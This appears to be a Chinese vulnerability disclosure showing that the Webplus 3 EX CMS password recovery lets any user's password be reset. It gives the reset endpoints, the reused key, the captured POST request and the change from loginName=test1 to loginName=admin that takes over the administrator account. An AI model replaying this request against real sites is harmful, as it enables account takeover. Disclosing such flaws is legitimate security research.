苏迪科技Webplus 3 EX网站群内容管理系统,用户密码找回功能存在设计缺陷,导致任意用户密码重置。
测试操作如下:
1.由于我们没有测试账号,因此需要先注册一个账号:(注册地址默认是不公开的,让人找得好辛苦啊!~~~)
http://www.ceshizhandian.edu.cn/_web/ids/userRegister.do?_p=YXM9MSZwPTEmbT1OJg__
一定要填写:密保问题和密保答案哟!
2. 找回密码:
密码类型选择[密保问题]
3. 回答密保问题
下一步:
出现这样一个link
http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a
特别需要注意的是key 27b09e73-8b7d-4575-aed5-aad9fb28478a
当然了,你此时可以用Fiddle记录一下,重置test1用户的提交数据内容,你可以发现提交的link是这样的:
http://www.ceshizhandian.edu.cn/_web/ids/resetNewPasswordRecoveryApply.do?loginName=test1&key=27b09e73-8b7d-4575-aed5-aad9fb28478a&_p=YXM9MSZ0PTAmcD0xJm09TiY_
POST 提交: Accept: text/ html , application/xhtml+xml, */* Referer: http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a Accept-Language: zh-CN User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: www.ceshizhandian.edu.cn Content-Length: 40 Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=6A7CA28760FC74156AC23F20AE72524B; validateImageValue=4963
如果将loginName=test1换成loginName=admin是否可以修改admin用户的密码?
答案是肯定滴!
查看更多关于苏迪Webplus 3 EX网站群内容管理系统任意用户密码的详细内容...